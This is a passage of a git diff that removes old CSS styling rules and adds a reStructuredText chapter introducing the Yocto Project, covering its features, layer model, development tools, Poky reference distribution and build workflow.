-  width:expression(document.body.clientWidth + "px");
-  margin-left:expression("-5em");
-}
-body {
-  padding:expression("4em 5em 0em 5em");
-}
-*/
-
-  /**************************************** /
- / mozilla vendor specific css extensions  /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
-  -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
-  -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
-  -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
-  display: none;
-}
-
-
-hr {
-  display: none;
-}
-
-table {
-  border: 0em;
-}
-
- .photo {
-  float: right;
-  margin-left:   1.5em;
-  margin-bottom: 1.5em;
-  margin-top: 0em;
-  max-width:      17em;
-  border:     1px solid gray;
-  padding:    3px;
-  background: white;
-}
- .seperator {
-   padding-top: 2em;
-   clear: both;
-  }
-
-  #validators {
-      margin-top: 5em;
-      text-align: right;
-      color: #777;
-  }
-  @media print {
-      body {
-          font-size: 8pt;
-      }
-      .noprint {
-          display: none;
-      }
-  }
-
-
-.tip,
-.note {
-   background: #f0f0f2;
-   color: #333;
-   padding: 20px;
-   margin: 20px;
-}
-
-.tip h3,
-.note h3 {
-   padding: 0em;
-   margin: 0em;
-   font-size: 2em;
-   font-weight: bold;
-   color: #333;
-}
-
-.tip a,
-.note a {
-   color: #333;
-   text-decoration: underline;
-}
-
-.footnote {
-   font-size: small;
-   color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
-   font-size:large;
-   color: #00557D;
-}
diff --git a/documentation/overview-manual/overview-manual-yp-intro.rst b/documentation/overview-manual/overview-manual-yp-intro.rst
new file mode 100644
index 0000000000..2675074f14
--- /dev/null
+++ b/documentation/overview-manual/overview-manual-yp-intro.rst
@@ -0,0 +1,941 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*****************************
+Introducing the Yocto Project
+*****************************
+
+What is the Yocto Project?
+==========================
+
+The Yocto Project is an open source collaboration project that helps
+developers create custom Linux-based systems that are designed for
+embedded products regardless of the product's hardware architecture.
+Yocto Project provides a flexible toolset and a development environment
+that allows embedded device developers across the world to collaborate
+through shared technologies, software stacks, configurations, and best
+practices used to create these tailored Linux images.
+
+Thousands of developers worldwide have discovered that Yocto Project
+provides advantages in both systems and applications development,
+archival and management benefits, and customizations used for speed,
+footprint, and memory utilization. The project is a standard when it
+comes to delivering embedded software stacks. The project allows
+software customizations and build interchange for multiple hardware
+platforms as well as software stacks that can be maintained and scaled.
+
+.. image:: figures/key-dev-elements.png
+    :align: center
+
+For further introductory information on the Yocto Project, you might be
+interested in this
+`article <https://www.embedded.com/electronics-blogs/say-what-/4458600/Why-the-Yocto-Project-for-my-IoT-Project->`__
+by Drew Moseley and in this short introductory
+`video <https://www.youtube.com/watch?v=utZpKM7i5Z4>`__.
+
+The remainder of this section overviews advantages and challenges tied
+to the Yocto Project.
+
+.. _gs-features:
+
+Features
+--------
+
+The following list describes features and advantages of the Yocto
+Project:
+
+-  *Widely Adopted Across the Industry:* Semiconductor, operating
+   system, software, and service vendors exist whose products and
+   services adopt and support the Yocto Project. For a look at the Yocto
+   Project community and the companies involved with the Yocto Project,
+   see the "COMMUNITY" and "ECOSYSTEM" tabs on the
+   :yocto_home:`Yocto Project <>` home page.
+
+-  *Architecture Agnostic:* Yocto Project supports Intel, ARM, MIPS,
+   AMD, PPC and other architectures. Most ODMs, OSVs, and chip vendors
+   create and supply BSPs that support their hardware. If you have
+   custom silicon, you can create a BSP that supports that architecture.
+
+   Aside from lots of architecture support, the Yocto Project fully
+   supports a wide range of device emulation through the Quick EMUlator
+   (QEMU).
+
+-  *Images and Code Transfer Easily:* Yocto Project output can easily
+   move between architectures without moving to new development
+   environments. Additionally, if you have used the Yocto Project to
+   create an image or application and you find yourself not able to
+   support it, commercial Linux vendors such as Wind River, Mentor
+   Graphics, Timesys, and ENEA could take it and provide ongoing
+   support. These vendors have offerings that are built using the Yocto
+   Project.
+
+-  *Flexibility:* Corporations use the Yocto Project many different
+   ways. One example is to create an internal Linux distribution as a
+   code base the corporation can use across multiple product groups.
+   Through customization and layering, a project group can leverage the
+   base Linux distribution to create a distribution that works for their
+   product needs.
+
+-  *Ideal for Constrained Embedded and IoT devices:* Unlike a full Linux
+   distribution, you can use the Yocto Project to create exactly what
+   you need for embedded devices. You only add the feature support or
+   packages that you absolutely need for the device. For devices that
+   have display hardware, you can use available system components such
+   as X11, GTK+, Qt, Clutter, and SDL (among others) to create a rich
+   user experience. For devices that do not have a display or where you
+   want to use alternative UI frameworks, you can choose to not install
+   these components.
+
+-  *Comprehensive Toolchain Capabilities:* Toolchains for supported
+   architectures satisfy most use cases. However, if your hardware
+   supports features that are not part of a standard toolchain, you can
+   easily customize that toolchain through specification of
+   platform-specific tuning parameters. And, should you need to use a
+   third-party toolchain, mechanisms built into the Yocto Project allow
+   for that.
+
+-  *Mechanism Rules Over Policy:* Focusing on mechanism rather than
+   policy ensures that you are free to set policies based on the needs
+   of your design instead of adopting decisions enforced by some system
+   software provider.
+
+-  *Uses a Layer Model:* The Yocto Project `layer
+   infrastructure <#the-yocto-project-layer-model>`__ groups related
+   functionality into separate bundles. You can incrementally add these
+   grouped functionalities to your project as needed. Using layers to
+   isolate and group functionality reduces project complexity and
+   redundancy, allows you to easily extend the system, make
+   customizations, and keep functionality organized.
+
+-  *Supports Partial Builds:* You can build and rebuild individual
+   packages as needed. Yocto Project accomplishes this through its
+   `shared-state cache <#shared-state-cache>`__ (sstate) scheme. Being
+   able to build and debug components individually eases project
+   development.
+
+-  *Releases According to a Strict Schedule:* Major releases occur on a
+   :doc:`six-month cycle <../ref-manual/ref-release-process>`
+   predictably in October and April. The most recent two releases
+   support point releases to address common vulnerabilities and
+   exposures. This predictability is crucial for projects based on the
+   Yocto Project and allows development teams to plan activities.
+
+-  *Rich Ecosystem of Individuals and Organizations:* For open source
+   projects, the value of community is very important. Support forums,
+   expertise, and active developers who continue to push the Yocto
+   Project forward are readily available.
+
+-  *Binary Reproducibility:* The Yocto Project allows you to be very
+   specific about dependencies and achieves very high percentages of
+   binary reproducibility (e.g. 99.8% for ``core-image-minimal``). When
+   distributions are not specific about which packages are pulled in and
+   in what order to support dependencies, other build systems can
+   arbitrarily include packages.
+
+-  *License Manifest:* The Yocto Project provides a :ref:`license
+   manifest <dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle>`
+   for review by people who need to track the use of open source
+   licenses (e.g. legal teams).
+
+.. _gs-challenges:
+
+Challenges
+----------
+
+The following list presents challenges you might encounter when
+developing using the Yocto Project:
+
+-  *Steep Learning Curve:* The Yocto Project has a steep learning curve
+   and has many different ways to accomplish similar tasks. It can be
+   difficult to choose how to proceed when varying methods exist by
+   which to accomplish a given task.
+
+-  *Understanding What Changes You Need to Make For Your Design Requires
+   Some Research:* Beyond the simple tutorial stage, understanding what
+   changes need to be made for your particular design can require a
+   significant amount of research and investigation. For information
+   that helps you transition from trying out the Yocto Project to using
+   it for your project, see the ":ref:`what-i-wish-id-known:what i wish i'd known about yocto project`" and
+   ":ref:`transitioning-to-a-custom-environment:transitioning to a custom environment for systems development`"
+   documents on the Yocto Project website.
+
+-  *Project Workflow Could Be Confusing:* The `Yocto Project
+   workflow <#overview-development-environment>`__ could be confusing if
+   you are used to traditional desktop and server software development.
+   In a desktop development environment, mechanisms exist to easily pull
+   and install new packages, which are typically pre-compiled binaries
+   from servers accessible over the Internet. Using the Yocto Project,
+   you must modify your configuration and rebuild to add additional
+   packages.
+
+-  *Working in a Cross-Build Environment Can Feel Unfamiliar:* When
+   developing code to run on a target, compilation, execution, and
+   testing done on the actual target can be faster than running a
+   BitBake build on a development host and then deploying binaries to
+   the target for test. While the Yocto Project does support development
+   tools on the target, the additional step of integrating your changes
+   back into the Yocto Project build environment would be required.
+   Yocto Project supports an intermediate approach that involves making
+   changes on the development system within the BitBake environment and
+   then deploying only the updated packages to the target.
+
+   The Yocto Project :term:`OpenEmbedded Build System`
+   produces packages
+   in standard formats (i.e. RPM, DEB, IPK, and TAR). You can deploy
+   these packages into the running system on the target by using
+   utilities on the target such as ``rpm`` or ``ipk``.
+
+-  *Initial Build Times Can be Significant:* Long initial build times
+   are unfortunately unavoidable due to the large number of packages
+   initially built from scratch for a fully functioning Linux system.
+   Once that initial build is completed, however, the shared-state
+   (sstate) cache mechanism Yocto Project uses keeps the system from
+   rebuilding packages that have not been "touched" since the last
+   build. The sstate mechanism significantly reduces times for
+   successive builds.
+
+The Yocto Project Layer Model
+=============================
+
+The Yocto Project's "Layer Model" is a development model for embedded
+and IoT Linux creation that distinguishes the Yocto Project from other
+simple build systems. The Layer Model simultaneously supports
+collaboration and customization. Layers are repositories that contain
+related sets of instructions that tell the :term:`OpenEmbedded Build System`
+what to do. You can
+collaborate, share, and reuse layers.
+
+Layers can contain changes to previous instructions or settings at any
+time. This powerful override capability is what allows you to customize
+previously supplied collaborative or community layers to suit your
+product requirements.
+
+You use different layers to logically separate information in your
+build. As an example, you could have BSP, GUI, distro configuration,
+middleware, or application layers. Putting your entire build into one
+layer limits and complicates future customization and reuse. Isolating
+information into layers, on the other hand, helps simplify future
+customizations and reuse. You might find it tempting to keep everything
+in one layer when working on a single project. However, the more modular
+your Metadata, the easier it is to cope with future changes.
+
+.. note::
+
+   -  Use Board Support Package (BSP) layers from silicon vendors when
+      possible.
+
+   -  Familiarize yourself with the `Yocto Project curated layer
+      index <https://www.yoctoproject.org/software-overview/layers/>`__
+      or the `OpenEmbedded layer
+      index <http://layers.openembedded.org/layerindex/branch/master/layers/>`__.
+      The latter contains more layers but they are less universally
+      validated.
+
+   -  Layers support the inclusion of technologies, hardware components,
+      and software components. The :ref:`Yocto Project
+      Compatible <dev-manual/dev-manual-common-tasks:making sure your layer is compatible with yocto project>`
+      designation provides a minimum level of standardization that
+      contributes to a strong ecosystem. "YP Compatible" is applied to
+      appropriate products and software components such as BSPs, other
+      OE-compatible layers, and related open-source projects, allowing
+      the producer to use Yocto Project badges and branding assets.
+
+To illustrate how layers are used to keep things modular, consider
+machine customizations. These types of customizations typically reside
+in a special layer, rather than a general layer, called a BSP Layer.
+Furthermore, the machine customizations should be isolated from recipes
+and Metadata that support a new GUI environment, for example. This
+situation gives you a couple of layers: one for the machine
+configurations, and one for the GUI environment. It is important to
+understand, however, that the BSP layer can still make machine-specific
+additions to recipes within the GUI environment layer without polluting
+the GUI layer itself with those machine-specific changes. You can
+accomplish this through a recipe that is a BitBake append
+(``.bbappend``) file, which is described later in this section.
+
+.. note::
+
+   For general information on BSP layer structure, see the
+   :doc:`../bsp-guide/bsp-guide`
+   .
+
+The :term:`Source Directory`
+contains both general layers and BSP layers right out of the box. You
+can easily identify layers that ship with a Yocto Project release in the
+Source Directory by their names. Layers typically have names that begin
+with the string ``meta-``.
+
+.. note::
+
+   It is not a requirement that a layer name begin with the prefix
+   meta-
+   , but it is a commonly accepted standard in the Yocto Project
+   community.
+
+For example, if you were to examine the :yocto_git:`tree
+view </cgit/cgit.cgi/poky/tree/>` of the
+``poky`` repository, you will see several layers: ``meta``,
+``meta-skeleton``, ``meta-selftest``, ``meta-poky``, and
+``meta-yocto-bsp``. Each of these repositories represents a distinct
+layer.
+
+For procedures on how to create layers, see the 
+":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section in the Yocto Project Development Tasks Manual.
+
+Components and Tools
+====================
+
+The Yocto Project employs a collection of components and tools used by
+the project itself, by project developers, and by those using the Yocto
+Project. These components and tools are open source projects and
+metadata that are separate from the reference distribution
+(:term:`Poky`) and the 
+:term:`OpenEmbedded Build System`. Most of the
+components and tools are downloaded separately.
+
+This section provides brief overviews of the components and tools
+associated with the Yocto Project.
+
+.. _gs-development-tools:
+
+Development Tools
+-----------------
+
+The following list consists of tools that help you develop images and
+applications using the Yocto Project:
+
+-  *CROPS:* `CROPS <https://github.com/crops/poky-container/>`__ is an
+   open source, cross-platform development framework that leverages
+   `Docker Containers <https://www.docker.com/>`__. CROPS provides an
+   easily managed, extensible environment that allows you to build
+   binaries for a variety of architectures on Windows, Linux and Mac OS
+   X hosts.
+
+-  *devtool:* This command-line tool is available as part of the
+   extensible SDK (eSDK) and is its cornerstone. You can use ``devtool``
+   to help build, test, and package software within the eSDK. You can
+   use the tool to optionally integrate what you build into an image
+   built by the OpenEmbedded build system.
+
+   The ``devtool`` command employs a number of sub-commands that allow
+   you to add, modify, and upgrade recipes. As with the OpenEmbedded
+   build system, "recipes" represent software packages within
+   ``devtool``. When you use ``devtool add``, a recipe is automatically
+   created. When you use ``devtool modify``, the specified existing
+   recipe is used in order to determine where to get the source code and
+   how to patch it. In both cases, an environment is set up so that when
+   you build the recipe a source tree that is under your control is used
+   in order to allow you to make changes to the source as desired. By
+   default, both new recipes and the source go into a "workspace"
+   directory under the eSDK. The ``devtool upgrade`` command updates an
+   existing recipe so that you can build it for an updated set of source
+   files.
+
+   You can read about the ``devtool`` workflow in the Yocto Project
+   Application Development and Extensible Software Development Kit
+   (eSDK) Manual in the 
+   ":ref:`sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk workflow`"
+   section.
+
+-  *Extensible Software Development Kit (eSDK):* The eSDK provides a
+   cross-development toolchain and libraries tailored to the contents of
+   a specific image. The eSDK makes it easy to add new applications and
+   libraries to an image, modify the source for an existing component,
+   test changes on the target hardware, and integrate into the rest of
+   the OpenEmbedded build system. The eSDK gives you a toolchain
+   experience supplemented with the powerful set of ``devtool`` commands
+   tailored for the Yocto Project environment.
+
+   For information on the eSDK, see the :doc:`../sdk-manual/sdk-manual` Manual.
+
+-  *Toaster:* Toaster is a web interface to the Yocto Project
+   OpenEmbedded build system. Toaster allows you to configure, run, and
+   view information about builds. For information on Toaster, see the
+   :doc:`../toaster-manual/toaster-manual`.
+
+.. _gs-production-tools:
+
+Production Tools
+----------------
+
+The following list consists of tools that help production related
+activities using the Yocto Project:
+
+-  *Auto Upgrade Helper:* This utility when used in conjunction with the
+   :term:`OpenEmbedded Build System`
+   (BitBake and
+   OE-Core) automatically generates upgrades for recipes that are based
+   on new versions of the recipes published upstream. See
+   :ref:`dev-manual/dev-manual-common-tasks:using the auto upgrade helper (auh)`
+   for how to set it up.
+
+-  *Recipe Reporting System:* The Recipe Reporting System tracks recipe
+   versions available for Yocto Project. The main purpose of the system
+   is to help you manage the recipes you maintain and to offer a dynamic
+   overview of the project. The Recipe Reporting System is built on top
+   of the `OpenEmbedded Layer
+   Index <http://layers.openembedded.org/layerindex/layers/>`__, which
+   is a website that indexes OpenEmbedded-Core layers.
+
+-  *Patchwork:* `Patchwork <https://patchwork.yoctoproject.org/>`__
+   is a fork of a project originally started by
+   `OzLabs <http://ozlabs.org/>`__. The project is a web-based tracking
+   system designed to streamline the process of bringing contributions
+   into a project. The Yocto Project uses Patchwork as an organizational
+   tool to handle patches, which number in the thousands for every
+   release.
+
+-  *AutoBuilder:* AutoBuilder is a project that automates build tests
+   and quality assurance (QA). By using the public AutoBuilder, anyone
+   can determine the status of the current "master" branch of Poky.
+
+   .. note::
+
+      AutoBuilder is based on buildbot.
+
+   A goal of the Yocto Project is to lead the open source industry with
+   a project that automates testing and QA procedures. In doing so, the
+   project encourages a development community that publishes QA and test
+   plans, publicly demonstrates QA and test plans, and encourages
+   development of tools that automate and test and QA procedures for the
+   benefit of the development community.
+
+   You can learn more about the AutoBuilder used by the Yocto Project
+   Autobuilder `here <&YOCTO_AB_URL;>`__.
+
+-  *Cross-Prelink:* Prelinking is the process of pre-computing the load
+   addresses and link tables generated by the dynamic linker as compared
+   to doing this at runtime. Doing this ahead of time results in
+   performance improvements when the application is launched and reduced
+   memory usage for libraries shared by many applications.
+
+   Historically, cross-prelink is a variant of prelink, which was
+   conceived by `Jakub
+   Jelínek <http://people.redhat.com/jakub/prelink.pdf>`__ a number of
+   years ago. Both prelink and cross-prelink are maintained in the same
+   repository albeit on separate branches. By providing an emulated
+   runtime dynamic linker (i.e. ``glibc``-derived ``ld.so`` emulation),
+   the cross-prelink project extends the prelink software's ability to
+   prelink a sysroot environment. Additionally, the cross-prelink
+   software enables the ability to work in sysroot style environments.
+
+   The dynamic linker determines standard load address calculations
+   based on a variety of factors such as mapping addresses, library
+   usage, and library function conflicts. The prelink tool uses this
+   information, from the dynamic linker, to determine unique load
+   addresses for executable and linkable format (ELF) binaries that are
+   shared libraries and dynamically linked. The prelink tool modifies
+   these ELF binaries with the pre-computed information. The result is
+   faster loading and often lower memory consumption because more of the
+   library code can be re-used from shared Copy-On-Write (COW) pages.
+
+   The original upstream prelink project only supports running prelink
+   on the end target device due to the reliance on the target device's
+   dynamic linker. This restriction causes issues when developing a
+   cross-compiled system. The cross-prelink adds a synthesized dynamic
+   loader that runs on the host, thus permitting cross-prelinking
+   without ever having to run on a read-write target filesystem.
+
+-  *Pseudo:* Pseudo is the Yocto Project implementation of
+   `fakeroot <http://man.he.net/man1/fakeroot>`__, which is used to run
+   commands in an environment that seemingly has root privileges.
+
+   During a build, it can be necessary to perform operations that
+   require system administrator privileges. For example, file ownership
+   or permissions might need definition. Pseudo is a tool that you can
+   either use directly or through the environment variable
+   ``LD_PRELOAD``. Either method allows these operations to succeed as
+   if system administrator privileges exist even when they do not.
+
+   You can read more about Pseudo in the "`Fakeroot and
+   Pseudo <#fakeroot-and-pseudo>`__" section.
+
+.. _gs-openembedded-build-system:
+
+Open-Embedded Build System Components
+-------------------------------------
+
+The following list consists of components associated with the
+:term:`OpenEmbedded Build System`:
+
+-  *BitBake:* BitBake is a core component of the Yocto Project and is
+   used by the OpenEmbedded build system to build images. While BitBake
+   is key to the build system, BitBake is maintained separately from the
+   Yocto Project.
+
+   BitBake is a generic task execution engine that allows shell and
+   Python tasks to be run efficiently and in parallel while working
+   within complex inter-task dependency constraints. In short, BitBake
+   is a build engine that works through recipes written in a specific
+   format in order to perform sets of tasks.
+
+   You can learn more about BitBake in the :doc:`BitBake User
+   Manual <bitbake:index>`.
+
+-  *OpenEmbedded-Core:* OpenEmbedded-Core (OE-Core) is a common layer of
+   metadata (i.e. recipes, classes, and associated files) used by
+   OpenEmbedded-derived systems, which includes the Yocto Project. The
+   Yocto Project and the OpenEmbedded Project both maintain the
+   OpenEmbedded-Core. You can find the OE-Core metadata in the Yocto
+   Project :yocto_git:`Source Repositories </cgit/cgit.cgi/poky/tree/meta>`.
+
+   Historically, the Yocto Project integrated the OE-Core metadata
+   throughout the Yocto Project source repository reference system
+   (Poky). After Yocto Project Version 1.0, the Yocto Project and
+   OpenEmbedded agreed to work together and share a common core set of
+   metadata (OE-Core), which contained much of the functionality
+   previously found in Poky. This collaboration achieved a long-standing
+   OpenEmbedded objective for having a more tightly controlled and
+   quality-assured core. The results also fit well with the Yocto
+   Project objective of achieving a smaller number of fully featured
+   tools as compared to many different ones.
+
+   Sharing a core set of metadata results in Poky as an integration
+   layer on top of OE-Core. You can see that in this
+   `figure <#yp-key-dev-elements>`__. The Yocto Project combines various
+   components such as BitBake, OE-Core, script "glue", and documentation
+   for its build system.
+
+.. _gs-reference-distribution-poky:
+
+Reference Distribution (Poky)
+-----------------------------
+
+Poky is the Yocto Project reference distribution. It contains the
+:term:`OpenEmbedded Build System`
+(BitBake and OE-Core) as well as a set of metadata to get you started
+building your own distribution. See the
+`figure <#what-is-the-yocto-project>`__ in "What is the Yocto Project?"
+section for an illustration that shows Poky and its relationship with
+other parts of the Yocto Project.
+
+To use the Yocto Project tools and components, you can download
+(``clone``) Poky and use it to bootstrap your own distribution.
+
+.. note::
+
+   Poky does not contain binary files. It is a working example of how to
+   build your own custom Linux distribution from source.
+
+You can read more about Poky in the "`Reference Embedded Distribution
+(Poky) <#reference-embedded-distribution>`__" section.
+
+.. _gs-packages-for-finished-targets:
+
+Packages for Finished Targets
+-----------------------------
+
+The following lists components associated with packages for finished
+targets:
+
+-  *Matchbox:* Matchbox is an Open Source, base environment for the X
+   Window System running on non-desktop, embedded platforms such as
+   handhelds, set-top boxes, kiosks, and anything else for which screen
+   space, input mechanisms, or system resources are limited.
+
+   Matchbox consists of a number of interchangeable and optional
+   applications that you can tailor to a specific, non-desktop platform
+   to enhance usability in constrained environments.
+
+   You can find the Matchbox source in the Yocto Project
+   :yocto_git:`Source Repositories <>`.
+
+-  *Opkg:* Open PacKaGe management (opkg) is a lightweight package
+   management system based on the itsy package (ipkg) management system.
+   Opkg is written in C and resembles Advanced Package Tool (APT) and
+   Debian Package (dpkg) in operation.
+
+   Opkg is intended for use on embedded Linux devices and is used in
+   this capacity in the
+   `OpenEmbedded <http://www.openembedded.org/wiki/Main_Page>`__ and
+   `OpenWrt <https://openwrt.org/>`__ projects, as well as the Yocto
+   Project.
+
+   .. note::
+
+      As best it can, opkg maintains backwards compatibility with ipkg
+      and conforms to a subset of Debian's policy manual regarding
+      control files.
+
+   You can find the opkg source in the Yocto Project
+   :yocto_git:`Source Repositories <>`.
+
+.. _gs-archived-components:
+
+Archived Components
+-------------------
+
+The Build Appliance is a virtual machine image that enables you to build
+and boot a custom embedded Linux image with the Yocto Project using a
+non-Linux development system.
+
+Historically, the Build Appliance was the second of three methods by
+which you could use the Yocto Project on a system that was not native to
+Linux.
+
+1. *Hob:* Hob, which is now deprecated and is no longer available since
+   the 2.1 release of the Yocto Project provided a rudimentary,
+   GUI-based interface to the Yocto Project. Toaster has fully replaced
+   Hob.
+
+2. *Build Appliance:* Post Hob, the Build Appliance became available. It
+   was never recommended that you use the Build Appliance as a
+   day-to-day production development environment with the Yocto Project.
+   Build Appliance was useful as a way to try out development in the
+   Yocto Project environment.
+
+3. *CROPS:* The final and best solution available now for developing
+   using the Yocto Project on a system not native to Linux is with
+   `CROPS <#gs-crops-overview>`__.
+
+.. _gs-development-methods:
+
+Development Methods
+===================
+
+The Yocto Project development environment usually involves a 
+:term:`Build Host` and target
+hardware. You use the Build Host to build images and develop
+applications, while you use the target hardware to test deployed
+software.
+
+This section provides an introduction to the choices or development
+methods you have when setting up your Build Host. Depending on the your
+particular workflow preference and the type of operating system your
+Build Host runs, several choices exist that allow you to use the Yocto
+Project.
+
+.. note::
+
+   For additional detail about the Yocto Project development
+   environment, see the ":doc:`overview-manual-development-environment`"
+   chapter.
+
+-  *Native Linux Host:* By far the best option for a Build Host. A
+   system running Linux as its native operating system allows you to
+   develop software by directly using the
+   :term:`BitBake` tool. You can
+   accomplish all aspects of development from a familiar shell of a
+   supported Linux distribution.
+
+   For information on how to set up a Build Host on a system running
+   Linux as its native operating system, see the 
+   ":ref:`dev-manual/dev-manual-start:setting up a native linux host`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  *CROss PlatformS (CROPS):* Typically, you use
+   `CROPS <https://github.com/crops/poky-container/>`__, which leverages
+   `Docker Containers <https://www.docker.com/>`__, to set up a Build
+   Host that is not running Linux (e.g. Microsoft Windows or macOS).
+
+   .. note::
+
+      You can, however, use CROPS on a Linux-based system.
+
+   CROPS is an open source, cross-platform development framework that
+   provides an easily managed, extensible environment for building
+   binaries targeted for a variety of architectures on Windows, macOS,
+   or Linux hosts. Once the Build Host is set up using CROPS, you can
+   prepare a shell environment to mimic that of a shell being used on a
+   system natively running Linux.
+
+   For information on how to set up a Build Host with CROPS, see the
+   ":ref:`dev-manual/dev-manual-start:setting up to use cross platforms (crops)`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  *Windows Subsystem For Linux (WSLv2):* You may use Windows Subsystem
+   For Linux v2 to set up a build host using Windows 10.
+
+   .. note::
+
+      The Yocto Project is not compatible with WSLv1, it is compatible
+      but not officially supported nor validated with WSLv2, if you
+      still decide to use WSL please upgrade to WSLv2.
+
+   The Windows Subsystem For Linux allows Windows 10 to run a real Linux
+   kernel inside of a lightweight utility virtual machine (VM) using
+   virtualization technology.
+
+   For information on how to set up a Build Host with WSLv2, see the
+   ":ref:`dev-manual/dev-manual-start:setting up to use windows subsystem for linux (wslv2)`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  *Toaster:* Regardless of what your Build Host is running, you can use
+   Toaster to develop software using the Yocto Project. Toaster is a web
+   interface to the Yocto Project's :term:`OpenEmbedded Build System`.
+   The interface
+   enables you to configure and run your builds. Information about
+   builds is collected and stored in a database. You can use Toaster to
+   configure and start builds on multiple remote build servers.
+
+   For information about and how to use Toaster, see the 
+   :doc:`../toaster-manual/toaster-manual`.
+
+.. _reference-embedded-distribution:
+
+Reference Embedded Distribution (Poky)
+======================================
+
+"Poky", which is pronounced *Pock*-ee, is the name of the Yocto
+Project's reference distribution or Reference OS Kit. Poky contains the
+:term:`OpenEmbedded Build System`
+(:term:`BitBake` and
+:term:`OpenEmbedded-Core (OE-Core)`) as well as a set
+of :term:`Metadata` to get you started
+building your own distro. In other words, Poky is a base specification
+of the functionality needed for a typical embedded system as well as the
+components from the Yocto Project that allow you to build a distribution
+into a usable binary image.
+
+Poky is a combined repository of BitBake, OpenEmbedded-Core (which is
+found in ``meta``), ``meta-poky``, ``meta-yocto-bsp``, and documentation
+provided all together and known to work well together. You can view
+these items that make up the Poky repository in the
+:yocto_git:`Source Repositories </cgit/cgit.cgi/poky/tree/>`.
+
+.. note::
+
+   If you are interested in all the contents of the
+   poky
+   Git repository, see the ":ref:`ref-manual/ref-structure:top-level core components`"
+   section in the Yocto Project Reference Manual.
+
+The following figure illustrates what generally comprises Poky:
+
+.. image:: figures/poky-reference-distribution.png
+    :align: center
+
+-  BitBake is a task executor and scheduler that is the heart of the
+   OpenEmbedded build system.
+
+-  ``meta-poky``, which is Poky-specific metadata.
+
+-  ``meta-yocto-bsp``, which are Yocto Project-specific Board Support
+   Packages (BSPs).
+
+-  OpenEmbedded-Core (OE-Core) metadata, which includes shared
+   configurations, global variable definitions, shared classes,
+   packaging, and recipes. Classes define the encapsulation and
+   inheritance of build logic. Recipes are the logical units of software
+   and images to be built.
+
+-  Documentation, which contains the Yocto Project source files used to
+   make the set of user manuals.
+
+.. note::
+
+   While Poky is a "complete" distribution specification and is tested
+   and put through QA, you cannot use it as a product "out of the box"
+   in its current form.
+
+To use the Yocto Project tools, you can use Git to clone (download) the
+Poky repository then use your local copy of the reference distribution
+to bootstrap your own distribution.
+
+.. note::
+
+   Poky does not contain binary files. It is a working example of how to
+   build your own custom Linux distribution from source.
+
+Poky has a regular, well established, six-month release cycle under its
+own version. Major releases occur at the same time major releases (point
+releases) occur for the Yocto Project, which are typically in the Spring
+and Fall. For more information on the Yocto Project release schedule and
+cadence, see the ":doc:`../ref-manual/ref-release-process`" chapter in the
+Yocto Project Reference Manual.
+
+Much has been said about Poky being a "default configuration". A default
+configuration provides a starting image footprint. You can use Poky out
+of the box to create an image ranging from a shell-accessible minimal
+image all the way up to a Linux Standard Base-compliant image that uses
+a GNOME Mobile and Embedded (GMAE) based reference user interface called
+Sato.
+
+One of the most powerful properties of Poky is that every aspect of a
+build is controlled by the metadata. You can use metadata to augment
+these base image types by adding metadata
+`layers <#the-yocto-project-layer-model>`__ that extend functionality.
+These layers can provide, for example, an additional software stack for
+an image type, add a board support package (BSP) for additional
+hardware, or even create a new image type.
+
+Metadata is loosely grouped into configuration files or package recipes.
+A recipe is a collection of non-executable metadata used by BitBake to
+set variables or define additional build-time tasks. A recipe contains
+fields such as the recipe description, the recipe version, the license
+of the package and the upstream source repository. A recipe might also
+indicate that the build process uses autotools, make, distutils or any
+other build process, in which case the basic functionality can be
+defined by the classes it inherits from the OE-Core layer's class
+definitions in ``./meta/classes``. Within a recipe you can also define
+additional tasks as well as task prerequisites. Recipe syntax through
+BitBake also supports both ``_prepend`` and ``_append`` operators as a
+method of extending task functionality. These operators inject code into
+the beginning or end of a task. For information on these BitBake
+operators, see the
+":ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:appending and prepending (override style syntax)`"
+section in the BitBake User's Manual.
+
+.. _openembedded-build-system-workflow:
+
+The OpenEmbedded Build System Workflow
+======================================
+
+The :term:`OpenEmbedded Build System` uses a "workflow" to
+accomplish image and SDK generation. The following figure overviews that
+workflow:
+
+.. image:: figures/YP-flow-diagram.png
+    :align: center
+
+Following is a brief summary of the "workflow":
+
+1. Developers specify architecture, policies, patches and configuration
+   details.
+
+2. The build system fetches and downloads the source code from the
+   specified location. The build system supports standard methods such
+   as tarballs or source code repositories systems such as Git.
+
+3. Once source code is downloaded, the build system extracts the sources
+   into a local work area where patches are applied and common steps for
+   configuring and compiling the software are run.
+
+4. The build system then installs the software into a temporary staging
+   area where the binary package format you select (DEB, RPM, or IPK) is
+   used to roll up the software.
+
+5. Different QA and sanity checks run throughout entire build process.
+
+6. After the binaries are created, the build system generates a binary
+   package feed that is used to create the final root file image.
+
+7. The build system generates the file system image and a customized
+   Extensible SDK (eSDK) for application development in parallel.
+
+For a very detailed look at this workflow, see the "`OpenEmbedded Build
+System Concepts <#openembedded-build-system-build-concepts>`__" section.
+
+Some Basic Terms
+================
+
+It helps to understand some basic fundamental terms when learning the
+Yocto Project. Although a list of terms exists in the ":doc:`Yocto Project
+Terms <../ref-manual/ref-terms>`" section of the Yocto Project
+Reference Manual, this section provides the definitions of some terms
+helpful for getting started:
+
+-  *Configuration Files:* Files that hold global definitions of
+   variables, user-defined variables, and hardware configuration
+   information. These files tell the :term:`OpenEmbedded Build System`
+   what to build and
+   what to put into the image to support a particular platform.
+
+-  *Extensible Software Development Kit (eSDK):* A custom SDK for
+   application developers. This eSDK allows developers to incorporate
+   their library and programming changes back into the image to make
+   their code available to other application developers. For information
+   on the eSDK, see the :doc:`../sdk-manual/sdk-manual` manual.
+
+-  *Layer:* A collection of related recipes. Layers allow you to
+   consolidate related metadata to customize your build. Layers also
